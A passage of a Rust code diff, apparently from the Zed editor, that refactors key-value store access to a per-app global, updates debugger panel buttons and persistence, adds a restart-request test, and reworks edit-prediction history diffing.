- });
+ $crate::inventory::submit! {
+ $crate::DomainMigration {
+ name: <$t as $crate::sqlez::domain::Domain>::NAME,
+ migrations: <$t as $crate::sqlez::domain::Domain>::MIGRATIONS,
+ dependencies: &[$(<$d as $crate::sqlez::domain::Domain>::NAME),*],
+ should_allow_migration_change: <$t as $crate::sqlez::domain::Domain>::should_allow_migration_change,
+ }
+ }
}
}
@@ -11,6 +11,12 @@ use crate::{
pub struct KeyValueStore(crate::sqlez::thread_safe_connection::ThreadSafeConnection);
+impl KeyValueStore {
+ pub fn from_app_db(db: &crate::AppDatabase) -> Self {
+ Self(db.0.clone())
+ }
+}
+
impl Domain for KeyValueStore {
const NAME: &str = stringify!(KeyValueStore);
@@ -32,26 +38,25 @@ impl Domain for KeyValueStore {
];
}
-crate::static_connection!(KEY_VALUE_STORE, KeyValueStore, []);
+crate::static_connection!(KeyValueStore, []);
pub trait Dismissable {
const KEY: &'static str;
- fn dismissed() -> bool {
- KEY_VALUE_STORE
+ fn dismissed(cx: &App) -> bool {
+ KeyValueStore::global(cx)
.read_kvp(Self::KEY)
.log_err()
.is_some_and(|s| s.is_some())
}
fn set_dismissed(is_dismissed: bool, cx: &mut App) {
+ let db = KeyValueStore::global(cx);
write_and_log(cx, move || async move {
if is_dismissed {
- KEY_VALUE_STORE
- .write_kvp(Self::KEY.into(), "1".into())
- .await
+ db.write_kvp(Self::KEY.into(), "1".into()).await
} else {
- KEY_VALUE_STORE.delete_kvp(Self::KEY.into()).await
+ db.delete_kvp(Self::KEY.into()).await
}
})
}
@@ -228,9 +233,26 @@ impl Domain for GlobalKeyValueStore {
)];
}
-crate::static_connection!(GLOBAL_KEY_VALUE_STORE, GlobalKeyValueStore, [], global);
+impl std::ops::Deref for GlobalKeyValueStore {
+ type Target = ThreadSafeConnection;
+ fn deref(&self) -> &Self::Target {
+ &self.0
+ }
+}
+
+static GLOBAL_KEY_VALUE_STORE: std::sync::LazyLock<GlobalKeyValueStore> =
+ std::sync::LazyLock::new(|| {
+ let db_dir = crate::database_dir();
+ GlobalKeyValueStore(smol::block_on(crate::open_db::<GlobalKeyValueStore>(
+ db_dir, "global",
+ )))
+ });
impl GlobalKeyValueStore {
+ pub fn global() -> &'static Self {
+ &GLOBAL_KEY_VALUE_STORE
+ }
+
query! {
pub fn read_kvp(key: &str) -> Result<Option<String>> {
SELECT value FROM kv_store WHERE key = (?)
@@ -1461,7 +1461,12 @@ async fn register_session_inner(
.detach();
})
.ok();
- let serialized_layout = persistence::get_serialized_layout(adapter_name).await;
+ let serialized_layout = this
+ .update(cx, |_, cx| {
+ persistence::get_serialized_layout(&adapter_name, &db::kvp::KeyValueStore::global(cx))
+ })
+ .ok()
+ .flatten();
let debug_session = this.update_in(cx, |this, window, cx| {
let parent_session = this
.sessions_with_children
@@ -1821,20 +1826,22 @@ impl Render for DebugPanel {
.gap_2()
.child(
Button::new("spawn-new-session-empty-state", "New Session")
- .icon(IconName::Plus)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Plus)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_, window, cx| {
window.dispatch_action(crate::Start.boxed_clone(), cx);
}),
)
.child(
Button::new("edit-debug-settings", "Edit debug.json")
- .icon(IconName::Code)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Code)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_, window, cx| {
window.dispatch_action(
zed_actions::OpenProjectDebugTasks.boxed_clone(),
@@ -1844,10 +1851,11 @@ impl Render for DebugPanel {
)
.child(
Button::new("open-debugger-docs", "Debugger Docs")
- .icon(IconName::Book)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Book)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_, _, cx| cx.open_url("https://zed.dev/docs/debugger")),
)
.child(
@@ -1855,10 +1863,11 @@ impl Render for DebugPanel {
"spawn-new-session-install-extensions",
"Debugger Extensions",
)
- .icon(IconName::Blocks)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Blocks)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_, window, cx| {
window.dispatch_action(
zed_actions::Extensions {
@@ -1,7 +1,7 @@
use anyhow::Context as _;
use collections::HashMap;
use dap::{Capabilities, adapters::DebugAdapterName};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use gpui::{Axis, Context, Entity, EntityId, Focusable, Subscription, WeakEntity, Window};
use project::Project;
use serde::{Deserialize, Serialize};
@@ -125,15 +125,15 @@ const DEBUGGER_PANEL_PREFIX: &str = "debugger_panel_";
pub(crate) async fn serialize_pane_layout(
adapter_name: DebugAdapterName,
pane_group: SerializedLayout,
+ kvp: KeyValueStore,
) -> anyhow::Result<()> {
let serialized_pane_group = serde_json::to_string(&pane_group)
.context("Serializing pane group with serde_json as a string")?;
- KEY_VALUE_STORE
- .write_kvp(
- format!("{DEBUGGER_PANEL_PREFIX}-{adapter_name}"),
- serialized_pane_group,
- )
- .await
+ kvp.write_kvp(
+ format!("{DEBUGGER_PANEL_PREFIX}-{adapter_name}"),
+ serialized_pane_group,
+ )
+ .await
}
pub(crate) fn build_serialized_layout(
@@ -187,13 +187,13 @@ fn serialize_pane(pane: &Entity<Pane>, cx: &App) -> SerializedPane {
}
}
-pub(crate) async fn get_serialized_layout(
+pub(crate) fn get_serialized_layout(
adapter_name: impl AsRef<str>,
+ kvp: &KeyValueStore,
) -> Option<SerializedLayout> {
let key = format!("{DEBUGGER_PANEL_PREFIX}-{}", adapter_name.as_ref());
- KEY_VALUE_STORE
- .read_kvp(&key)
+ kvp.read_kvp(&key)
.log_err()
.flatten()
.and_then(|value| serde_json::from_str::<SerializedLayout>(&value).ok())
@@ -1313,6 +1313,7 @@ impl RunningState {
show_summary: false,
show_command: false,
show_rerun: false,
+ save: task::SaveStrategy::default(),
};
let workspace = self.workspace.clone();
@@ -1501,9 +1502,14 @@ impl RunningState {
return;
};
- persistence::serialize_pane_layout(adapter_name, pane_layout)
- .await
- .log_err();
+ let kvp = this
+ .read_with(cx, |_, cx| db::kvp::KeyValueStore::global(cx))
+ .ok();
+ if let Some(kvp) = kvp {
+ persistence::serialize_pane_layout(adapter_name, pane_layout, kvp)
+ .await
+ .log_err();
+ }
this.update(cx, |this, _| {
this._schedule_serialize.take();
@@ -6,7 +6,7 @@ use std::{
};
use dap::{Capabilities, ExceptionBreakpointsFilter, adapters::DebugAdapterName};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::Editor;
use gpui::{
Action, AppContext, ClickEvent, Entity, FocusHandle, Focusable, MouseButton, ScrollStrategy,
@@ -520,8 +520,9 @@ impl BreakpointList {
});
let value = serde_json::to_string(&settings);
+ let kvp = KeyValueStore::global(cx);
cx.background_executor()
- .spawn(async move { KEY_VALUE_STORE.write_kvp(key, value?).await })
+ .spawn(async move { kvp.write_kvp(key, value?).await })
} else {
Task::ready(Result::Ok(()))
}
@@ -532,7 +533,7 @@ impl BreakpointList {
adapter_name: DebugAdapterName,
cx: &mut Context<Self>,
) -> anyhow::Result<()> {
- let Some(val) = KEY_VALUE_STORE.read_kvp(&Self::kvp_key(&adapter_name))? else {
+ let Some(val) = KeyValueStore::global(cx).read_kvp(&Self::kvp_key(&adapter_name))? else {
return Ok(());
};
let value: PersistedAdapterOptions = serde_json::from_str(&val)?;
@@ -303,7 +303,8 @@ impl Console {
}
fn previous_query(&mut self, _: &SelectPrevious, window: &mut Window, cx: &mut Context<Self>) {
- let prev = self.history.previous(&mut self.cursor);
+ let current_query = self.query_bar.read(cx).text(cx);
+        let prev = self.history.previous(&mut self.cursor, &current_query);
if let Some(prev) = prev {
self.query_bar.update(cx, |editor, cx| {
editor.set_text(prev, window, cx);
@@ -5,7 +5,7 @@ use std::time::Duration;
use anyhow::{Context as _, Result, anyhow};
use dap::StackFrameId;
use dap::adapters::DebugAdapterName;
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use gpui::{
Action, AnyElement, Entity, EventEmitter, FocusHandle, Focusable, FontWeight, ListState,
Subscription, Task, WeakEntity, list,
@@ -122,7 +122,7 @@ impl StackFrameList {
.flatten()
.and_then(|database_id| {
let key = stack_frame_filter_key(&session.read(cx).adapter(), database_id);
- KEY_VALUE_STORE
+ KeyValueStore::global(cx)
.read_kvp(&key)
.ok()
.flatten()
@@ -852,8 +852,10 @@ impl StackFrameList {
.flatten()
{
let key = stack_frame_filter_key(&self.session.read(cx).adapter(), database_id);
- let save_task = KEY_VALUE_STORE.write_kvp(key, self.list_filter.into());
- cx.background_spawn(save_task).detach();
+ let kvp = KeyValueStore::global(cx);
+ let filter: String = self.list_filter.into();
+ cx.background_spawn(async move { kvp.write_kvp(key, filter).await })
+ .detach();
}
if let Some(ThreadStatus::Stopped) = thread_status {
@@ -132,7 +132,13 @@ pub fn start_debug_session_with<T: Fn(&Arc<DebugAdapterClient>) + 'static>(
.workspace()
.read(cx)
.panel::<DebugPanel>(cx)
- .and_then(|panel| panel.read(cx).active_session())
+ .and_then(|panel| {
+ panel
+ .read(cx)
+ .sessions_with_children
+ .keys()
+ .max_by_key(|session| session.read(cx).session_id(cx))
+ })
.map(|session| session.read(cx).running_state().read(cx).session())
.cloned()
.context("Failed to get active session")
@@ -27,7 +27,7 @@ use std::{
path::Path,
sync::{
Arc,
- atomic::{AtomicBool, Ordering},
+ atomic::{AtomicBool, AtomicUsize, Ordering},
},
};
use terminal_view::terminal_panel::TerminalPanel;
@@ -2481,3 +2481,75 @@ async fn test_adapter_shutdown_with_child_sessions_on_app_quit(
"Child session should have received disconnect request"
);
}
+
+#[gpui::test]
+async fn test_restart_request_is_not_sent_more_than_once_until_response(
+ executor: BackgroundExecutor,
+ cx: &mut TestAppContext,
+) {
+ init_test(cx);
+
+ let fs = FakeFs::new(executor.clone());
+
+ fs.insert_tree(
+ path!("/project"),
+ json!({
+ "main.rs": "First line\nSecond line\nThird line\nFourth line",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/project").as_ref()], cx).await;
+ let workspace = init_test_workspace(&project, cx).await;
+ let cx = &mut VisualTestContext::from_window(*workspace, cx);
+
+ let session = start_debug_session(&workspace, cx, move |client| {
+ client.on_request::<dap::requests::Initialize, _>(move |_, _| {
+ Ok(dap::Capabilities {
+ supports_restart_request: Some(true),
+ ..Default::default()
+ })
+ });
+ })
+ .unwrap();
+
+ let client = session.update(cx, |session, _| session.adapter_client().unwrap());
+
+ let restart_count = Arc::new(AtomicUsize::new(0));
+
+ client.on_request::<dap::requests::Restart, _>({
+ let restart_count = restart_count.clone();
+ move |_, _| {
+ restart_count.fetch_add(1, Ordering::SeqCst);
+ Ok(())
+ }
+ });
+
+ // This works because the restart request sender is on the foreground thread
+ // so it will start running after the gpui update stack is cleared
+ session.update(cx, |session, cx| {
+ session.restart(None, cx);
+ session.restart(None, cx);
+ session.restart(None, cx);
+ });
+
+ cx.run_until_parked();
+
+ assert_eq!(
+ restart_count.load(Ordering::SeqCst),
+ 1,
+ "Only one restart request should be sent while a restart is in-flight"
+ );
+
+ session.update(cx, |session, cx| {
+ session.restart(None, cx);
+ });
+
+ cx.run_until_parked();
+
+ assert_eq!(
+ restart_count.load(Ordering::SeqCst),
+ 2,
+ "A second restart should be allowed after the first one completes"
+ );
+}
@@ -9,7 +9,7 @@ use dap::{
StackFrame,
requests::{Scopes, StackTrace, Threads},
};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::{Editor, ToPoint as _};
use gpui::{BackgroundExecutor, TestAppContext, VisualTestContext};
use project::{FakeFs, Project};
@@ -1217,7 +1217,10 @@ async fn test_stack_frame_filter_persistence(
.expect("workspace id has to be some for this test to work properly");
let key = stack_frame_filter_key(&adapter_name, workspace_id);
- let stored_value = KEY_VALUE_STORE.read_kvp(&key).unwrap();
+ let stored_value = cx
+ .update(|_, cx| KeyValueStore::global(cx))
+ .read_kvp(&key)
+ .unwrap();
assert_eq!(
stored_value,
Some(StackFrameFilter::OnlyUserFrames.into()),
@@ -28,7 +28,7 @@ pub struct DiagnosticIndicator {
impl Render for DiagnosticIndicator {
fn render(&mut self, _: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
- let indicator = h_flex().gap_2();
+ let indicator = h_flex().gap_2().min_w_0().overflow_x_hidden();
if !ProjectSettings::get_global(cx).diagnostics.button {
return indicator.hidden();
}
@@ -67,6 +67,7 @@ impl Render for DiagnosticIndicator {
Some(
Button::new("diagnostic_message", SharedString::new(message))
.label_size(LabelSize::Small)
+ .truncate(true)
.tooltip(|_window, cx| {
Tooltip::for_action(
"Next Diagnostic",
@@ -17,7 +17,7 @@ cli-support = []
[dependencies]
ai_onboarding.workspace = true
anyhow.workspace = true
-arrayvec.workspace = true
+heapless.workspace = true
brotli.workspace = true
buffer_diff.workspace = true
client.workspace = true
@@ -1,5 +1,4 @@
use anyhow::Result;
-use arrayvec::ArrayVec;
use client::{Client, EditPredictionUsage, UserStore};
use cloud_api_types::{OrganizationId, SubmitEditPredictionFeedbackBody};
use cloud_llm_client::predict_edits_v3::{
@@ -12,7 +11,7 @@ use cloud_llm_client::{
};
use collections::{HashMap, HashSet};
use copilot::{Copilot, Reinstall, SignIn, SignOut};
-use db::kvp::{Dismissable, KEY_VALUE_STORE};
+use db::kvp::{Dismissable, KeyValueStore};
use edit_prediction_context::{RelatedExcerptStore, RelatedExcerptStoreEvent, RelatedFile};
use feature_flags::{FeatureFlag, FeatureFlagAppExt as _};
use futures::{
@@ -23,14 +22,15 @@ use futures::{
use gpui::BackgroundExecutor;
use gpui::http_client::Url;
use gpui::{
- App, AsyncApp, Entity, EntityId, Global, SharedString, Subscription, Task, WeakEntity, actions,
+ App, AsyncApp, Entity, EntityId, Global, SharedString, Task, WeakEntity, actions,
http_client::{self, AsyncBody, Method},
prelude::*,
};
+use heapless::Vec as ArrayVec;
use language::language_settings::all_language_settings;
use language::{Anchor, Buffer, File, Point, TextBufferSnapshot, ToOffset, ToPoint};
use language::{BufferSnapshot, OffsetRangeExt};
-use language_model::{LlmApiToken, NeedsLlmTokenRefresh, RefreshLlmTokenListener};
+use language_model::{LlmApiToken, NeedsLlmTokenRefresh};
use project::{DisableAiSettings, Project, ProjectPath, WorktreeId};
use release_channel::AppVersion;
use semver::Version;
@@ -41,7 +41,7 @@ use settings::{
use std::collections::{VecDeque, hash_map};
use std::env;
use text::{AnchorRangeExt, Edit};
-use workspace::Workspace;
+use workspace::{AppState, Workspace};
use zeta_prompt::{ZetaFormat, ZetaPromptInput};
use std::mem;
@@ -75,6 +75,7 @@ pub mod zeta;
#[cfg(test)]
mod edit_prediction_tests;
+use crate::cursor_excerpt::expand_context_syntactically_then_linewise;
use crate::example_spec::ExampleSpec;
use crate::license_detection::LicenseDetectionWatcher;
use crate::mercury::Mercury;
@@ -99,8 +100,10 @@ actions!(
);
/// Maximum number of events to track.
-const EVENT_COUNT_MAX: usize = 6;
+const EVENT_COUNT_MAX: usize = 10;
const CHANGE_GROUPING_LINE_SPAN: u32 = 8;
+const EDIT_HISTORY_DIFF_SIZE_LIMIT: usize = 2048 * 3; // ~2048 tokens or ~50% of typical prompt budget
+const COLLABORATOR_EDIT_LOCALITY_CONTEXT_TOKENS: usize = 512;
const LAST_CHANGE_GROUPING_TIME: Duration = Duration::from_secs(1);
const ZED_PREDICT_DATA_COLLECTION_CHOICE: &str = "zed_predict_data_collection_choice";
const REJECT_REQUEST_DEBOUNCE: Duration = Duration::from_secs(15);
@@ -133,7 +136,6 @@ pub struct EditPredictionStore {
client: Arc<Client>,
user_store: Entity<UserStore>,
llm_token: LlmApiToken,
- _llm_token_subscription: Subscription,
_fetch_experiments_task: Task<()>,
projects: HashMap<EntityId, ProjectState>,
update_required: bool,
@@ -243,21 +245,31 @@ pub enum UserActionType {
pub struct StoredEvent {
pub event: Arc<zeta_prompt::Event>,
pub old_snapshot: TextBufferSnapshot,
- pub edit_range: Range<Anchor>,
+ pub new_snapshot_version: clock::Global,
+ pub total_edit_range: Range<Anchor>,
}
impl StoredEvent {
fn can_merge(
&self,
- next_old_event: &&&StoredEvent,
- new_snapshot: &TextBufferSnapshot,
- last_edit_range: &Range<Anchor>,
+ next_old_event: &StoredEvent,
+ latest_snapshot: &TextBufferSnapshot,
+ latest_edit_range: &Range<Anchor>,
) -> bool {
- // Events must be for the same buffer
+ // Events must be for the same buffer and be contiguous across included snapshots to be mergeable.
if self.old_snapshot.remote_id() != next_old_event.old_snapshot.remote_id() {
return false;
}
- if self.old_snapshot.remote_id() != new_snapshot.remote_id() {
+ if self.old_snapshot.remote_id() != latest_snapshot.remote_id() {
+ return false;
+ }
+ if self.new_snapshot_version != next_old_event.old_snapshot.version {
+ return false;
+ }
+ if !latest_snapshot
+ .version
+ .observed_all(&next_old_event.new_snapshot_version)
+ {
return false;
}
@@ -282,9 +294,9 @@ impl StoredEvent {
return false;
}
- let left_range = self.edit_range.to_point(new_snapshot);
- let right_range = next_old_event.edit_range.to_point(new_snapshot);
- let latest_range = last_edit_range.to_point(&new_snapshot);
+ let left_range = self.total_edit_range.to_point(latest_snapshot);
+ let right_range = next_old_event.total_edit_range.to_point(latest_snapshot);
+ let latest_range = latest_edit_range.to_point(latest_snapshot);
// Events near to the latest edit are not merged if their sources differ.
if lines_between_ranges(&left_range, &latest_range)
@@ -320,7 +332,7 @@ struct ProjectState {
registered_buffers: HashMap<gpui::EntityId, RegisteredBuffer>,
current_prediction: Option<CurrentEditPrediction>,
next_pending_prediction_id: usize,
- pending_predictions: ArrayVec<PendingPrediction, 2>,
+ pending_predictions: ArrayVec<PendingPrediction, 2, u8>,
debug_tx: Option<mpsc::UnboundedSender<DebugEvent>>,
last_edit_prediction_refresh: Option<(EntityId, Instant)>,
last_jump_prediction_refresh: Option<(EntityId, Instant)>,
@@ -374,6 +386,7 @@ impl ProjectState {
EditPredictionRejectReason::Canceled,
false,
None,
+ None,
cx,
);
})
@@ -402,6 +415,7 @@ struct CurrentEditPrediction {
pub prediction: EditPrediction,
pub was_shown: bool,
pub shown_with: Option<edit_prediction_types::SuggestionDisplayType>,
+ pub e2e_latency: std::time::Duration,
}
impl CurrentEditPrediction {
@@ -495,12 +509,14 @@ impl std::ops::Deref for BufferEditPrediction<'_> {
}
#[derive(Clone)]
+
struct PendingSettledPrediction {
request_id: EditPredictionId,
editable_anchor_range: Range<Anchor>,
example: Option<ExampleSpec>,
enqueued_at: Instant,
last_edit_at: Instant,
+ e2e_latency: std::time::Duration,
}
struct RegisteredBuffer {
@@ -517,7 +533,9 @@ struct LastEvent {
new_snapshot: TextBufferSnapshot,
old_file: Option<Arc<dyn File>>,
new_file: Option<Arc<dyn File>>,
- edit_range: Option<Range<Anchor>>,
+ latest_edit_range: Range<Anchor>,
+ total_edit_range: Range<Anchor>,
+ total_edit_range_at_last_pause_boundary: Option<Range<Anchor>>,
predicted: bool,
snapshot_after_last_editing_pause: Option<TextBufferSnapshot>,
last_edit_time: Option<Instant>,
@@ -543,8 +561,11 @@ impl LastEvent {
})
});
- let (diff, edit_range) =
- compute_diff_between_snapshots(&self.old_snapshot, &self.new_snapshot)?;
+ let (diff, edit_range) = compute_diff_between_snapshots_in_range(
+ &self.old_snapshot,
+ &self.new_snapshot,
+ &self.total_edit_range,
+ )?;
if path == old_path && diff.is_empty() {
None
@@ -557,9 +578,10 @@ impl LastEvent {
in_open_source_repo,
predicted: self.predicted,
}),
- edit_range: self.new_snapshot.anchor_before(edit_range.start)
- ..self.new_snapshot.anchor_before(edit_range.end),
old_snapshot: self.old_snapshot.clone(),
+ new_snapshot_version: self.new_snapshot.version.clone(),
+ total_edit_range: self.new_snapshot.anchor_before(edit_range.start)
+ ..self.new_snapshot.anchor_before(edit_range.end),
})
}
}
@@ -569,12 +591,28 @@ impl LastEvent {
return (self.clone(), None);
};
+ let total_edit_range_before_pause = self
+ .total_edit_range_at_last_pause_boundary
+ .clone()
+ .unwrap_or_else(|| self.total_edit_range.clone());
+
+ let Some(total_edit_range_after_pause) =
+ compute_total_edit_range_between_snapshots(boundary_snapshot, &self.new_snapshot)
+ else {
+ return (self.clone(), None);
+ };
+
+ let latest_edit_range_before_pause = total_edit_range_before_pause.clone();
+ let latest_edit_range_after_pause = total_edit_range_after_pause.clone();
+
let before = LastEvent {
old_snapshot: self.old_snapshot.clone(),
new_snapshot: boundary_snapshot.clone(),
old_file: self.old_file.clone(),
new_file: self.new_file.clone(),
- edit_range: None,
+ latest_edit_range: latest_edit_range_before_pause,
+ total_edit_range: total_edit_range_before_pause,
+ total_edit_range_at_last_pause_boundary: None,
predicted: self.predicted,
snapshot_after_last_editing_pause: None,
last_edit_time: self.last_edit_time,
@@ -585,7 +623,9 @@ impl LastEvent {
new_snapshot: self.new_snapshot.clone(),
old_file: self.old_file.clone(),
new_file: self.new_file.clone(),
- edit_range: None,
+ latest_edit_range: latest_edit_range_after_pause,
+ total_edit_range: total_edit_range_after_pause,
+ total_edit_range_at_last_pause_boundary: None,
predicted: self.predicted,
snapshot_after_last_editing_pause: None,
last_edit_time: self.last_edit_time,
@@ -595,21 +635,78 @@ impl LastEvent {
}
}
-pub(crate) fn compute_diff_between_snapshots(
+fn compute_total_edit_range_between_snapshots(
old_snapshot: &TextBufferSnapshot,
new_snapshot: &TextBufferSnapshot,
-) -> Option<(String, Range<Point>)> {
+) -> Option<Range<Anchor>> {
let edits: Vec<Edit<usize>> = new_snapshot
.edits_since::<usize>(&old_snapshot.version)
.collect();
let (first_edit, last_edit) = edits.first().zip(edits.last())?;
-
- let old_start_point = old_snapshot.offset_to_point(first_edit.old.start);
- let old_end_point = old_snapshot.offset_to_point(last_edit.old.end);
let new_start_point = new_snapshot.offset_to_point(first_edit.new.start);
let new_end_point = new_snapshot.offset_to_point(last_edit.new.end);
+ Some(new_snapshot.anchor_before(new_start_point)..new_snapshot.anchor_before(new_end_point))
+}
+
+fn compute_old_range_for_new_range(
+ old_snapshot: &TextBufferSnapshot,
+ new_snapshot: &TextBufferSnapshot,
+ total_edit_range: &Range<Anchor>,
+) -> Option<Range<Point>> {
+ let new_start_offset = total_edit_range.start.to_offset(new_snapshot);
+ let new_end_offset = total_edit_range.end.to_offset(new_snapshot);
+
+ let edits: Vec<Edit<usize>> = new_snapshot
+ .edits_since::<usize>(&old_snapshot.version)
+ .collect();
+ let mut old_start_offset = None;
+ let mut old_end_offset = None;
+ let mut delta: isize = 0;
+
+ for edit in &edits {
+ if old_start_offset.is_none() && new_start_offset <= edit.new.end {
+ old_start_offset = Some(if new_start_offset < edit.new.start {
+ new_start_offset.checked_add_signed(-delta)?
+ } else {
+ edit.old.start
+ });
+ }
+
+ if old_end_offset.is_none() && new_end_offset <= edit.new.end {
+ old_end_offset = Some(if new_end_offset < edit.new.start {
+ new_end_offset.checked_add_signed(-delta)?
+ } else {
+ edit.old.end
+ });
+ }
+
+ delta += edit.new.len() as isize - edit.old.len() as isize;
+ }
+
+ let old_start_offset =
+ old_start_offset.unwrap_or_else(|| new_start_offset.saturating_add_signed(-delta));
+ let old_end_offset =
+ old_end_offset.unwrap_or_else(|| new_end_offset.saturating_add_signed(-delta));
+
+ Some(
+ old_snapshot.offset_to_point(old_start_offset)
+ ..old_snapshot.offset_to_point(old_end_offset),
+ )
+}
+
+fn compute_diff_between_snapshots_in_range(
+ old_snapshot: &TextBufferSnapshot,
+ new_snapshot: &TextBufferSnapshot,
+ total_edit_range: &Range<Anchor>,
+) -> Option<(String, Range<Point>)> {
+ let new_start_point = total_edit_range.start.to_point(new_snapshot);
+ let new_end_point = total_edit_range.end.to_point(new_snapshot);
+ let old_range = compute_old_range_for_new_range(old_snapshot, new_snapshot, total_edit_range)?;
+ let old_start_point = old_range.start;
+ let old_end_point = old_range.end;
+
const CONTEXT_LINES: u32 = 3;
let old_context_start_row = old_start_point.row.saturating_sub(CONTEXT_LINES);
@@ -628,6 +725,12 @@ pub(crate) fn compute_diff_between_snapshots(
let old_edit_range = old_start_line_offset..old_end_line_offset;
let new_edit_range = new_start_line_offset..new_end_line_offset;
+ if new_edit_range.len() > EDIT_HISTORY_DIFF_SIZE_LIMIT
+ || old_edit_range.len() > EDIT_HISTORY_DIFF_SIZE_LIMIT
+ {
+ return None;
+ }
+
let old_region_text: String = old_snapshot.text_for_range(old_edit_range).collect();
let new_region_text: String = new_snapshot.text_for_range(new_edit_range).collect();
@@ -674,10 +777,9 @@ impl EditPredictionStore {
}
pub fn new(client: Arc<Client>, user_store: Entity<UserStore>, cx: &mut Context<Self>) -> Self {
- let refresh_llm_token_listener = RefreshLlmTokenListener::global(cx);
- let data_collection_choice = Self::load_data_collection_choice();
+ let data_collection_choice = Self::load_data_collection_choice(cx);
- let llm_token = LlmApiToken::default();
+ let llm_token = LlmApiToken::global(cx);
let (reject_tx, reject_rx) = mpsc::unbounded();
cx.background_spawn({
@@ -721,23 +823,6 @@ impl EditPredictionStore {
user_store,
llm_token,
_fetch_experiments_task: fetch_experiments_task,
- _llm_token_subscription: cx.subscribe(
- &refresh_llm_token_listener,
- |this, _listener, _event, cx| {
- let client = this.client.clone();
- let llm_token = this.llm_token.clone();
- let organization_id = this
- .user_store
- .read(cx)
- .current_organization()
- .map(|organization| organization.id.clone());
- cx.spawn(async move |_this, _cx| {
- llm_token.refresh(&client, organization_id).await?;
- anyhow::Ok(())
- })
- .detach_and_log_err(cx);
- },
- ),
update_required: false,
edit_prediction_model: EditPredictionModel::Zeta,
zeta2_raw_config: Self::zeta2_raw_config_from_env(),
@@ -893,6 +978,10 @@ impl EditPredictionStore {
self.mercury.api_token.read(cx).has_key()
}
+ pub fn mercury_has_payment_required_error(&self) -> bool {
+ self.mercury.has_payment_required_error()
+ }
+
pub fn clear_history(&mut self) {
for project_state in self.projects.values_mut() {
project_state.events.clear();
@@ -1217,10 +1306,12 @@ impl EditPredictionStore {
cx.subscribe(buffer, {
let project = project.downgrade();
move |this, buffer, event, cx| {
- if let language::BufferEvent::Edited = event
+ if let language::BufferEvent::Edited { is_local } = event
&& let Some(project) = project.upgrade()
{
- this.report_changes_for_buffer(&buffer, &project, false, cx);
+ this.report_changes_for_buffer(
+ &buffer, &project, false, *is_local, cx,
+ );
}
}
}),
@@ -1242,6 +1333,7 @@ impl EditPredictionStore {
buffer: &Entity<Buffer>,
project: &Entity<Project>,
is_predicted: bool,
+ is_local: bool,
cx: &mut Context<Self>,
) {
let project_state = self.get_or_init_project(project, cx);
@@ -1253,7 +1345,6 @@ impl EditPredictionStore {
if new_snapshot.version == registered_buffer.snapshot.version {
return;
}
-
let old_file = mem::replace(&mut registered_buffer.file, new_file.clone());
let old_snapshot = mem::replace(&mut registered_buffer.snapshot, new_snapshot.clone());
let mut num_edits = 0usize;
@@ -1286,32 +1377,64 @@ impl EditPredictionStore {
}
}
- let action_type = match (total_deleted, total_inserted, num_edits) {
- (0, ins, n) if ins == n => UserActionType::InsertChar,
- (0, _, _) => UserActionType::InsertSelection,
- (del, 0, n) if del == n => UserActionType::DeleteChar,
- (_, 0, _) => UserActionType::DeleteSelection,
- (_, ins, n) if ins == n => UserActionType::InsertChar,
- (_, _, _) => UserActionType::InsertSelection,
- };
+ let include_in_history = is_local
+ || collaborator_edit_overlaps_locality_region(
+ project_state,
+ project,
+ buffer,
+ &buf.snapshot(),
+ &edit_range,
+ cx,
+ );
- if let Some(offset) = last_offset {
- let point = new_snapshot.offset_to_point(offset);
- let timestamp_epoch_ms = SystemTime::now()
- .duration_since(UNIX_EPOCH)
- .map(|d| d.as_millis() as u64)
- .unwrap_or(0);
- project_state.record_user_action(UserActionRecord {
- action_type,
- buffer_id: buffer.entity_id(),
- line_number: point.row,
- offset,
- timestamp_epoch_ms,
- });
+ if is_local {
+ let action_type = match (total_deleted, total_inserted, num_edits) {
+ (0, ins, n) if ins == n => UserActionType::InsertChar,
+ (0, _, _) => UserActionType::InsertSelection,
+ (del, 0, n) if del == n => UserActionType::DeleteChar,
+ (_, 0, _) => UserActionType::DeleteSelection,
+ (_, ins, n) if ins == n => UserActionType::InsertChar,
+ (_, _, _) => UserActionType::InsertSelection,
+ };
+
+ if let Some(offset) = last_offset {
+ let point = new_snapshot.offset_to_point(offset);
+ let timestamp_epoch_ms = SystemTime::now()
+ .duration_since(UNIX_EPOCH)
+ .map(|d| d.as_millis() as u64)
+ .unwrap_or(0);
+ project_state.record_user_action(UserActionRecord {
+ action_type,
+ buffer_id: buffer.entity_id(),
+ line_number: point.row,
+ offset,
+ timestamp_epoch_ms,
+ });
+ }
}
+ if !include_in_history {
+ return;
+ }
+
+ let is_recordable_history_edit =
+ compute_diff_between_snapshots_in_range(&old_snapshot, &new_snapshot, &edit_range)
+ .is_some();
+
let events = &mut project_state.events;
+ if !is_recordable_history_edit {
+ if let Some(event) = project_state.last_event.take() {
+ if let Some(event) = event.finalize(&project_state.license_detection_watchers, cx) {
+ if events.len() + 1 >= EVENT_COUNT_MAX {
+ events.pop_front();
+ }
+ events.push_back(event);
+ }
+ }
+ return;
+ }
+
if let Some(last_event) = project_state.last_event.as_mut() {
let is_next_snapshot_of_same_buffer = old_snapshot.remote_id()
== last_event.new_snapshot.remote_id()
@@ -1321,15 +1444,10 @@ impl EditPredictionStore {
let should_coalesce = is_next_snapshot_of_same_buffer
&& !prediction_source_changed
- && last_event
- .edit_range
- .as_ref()
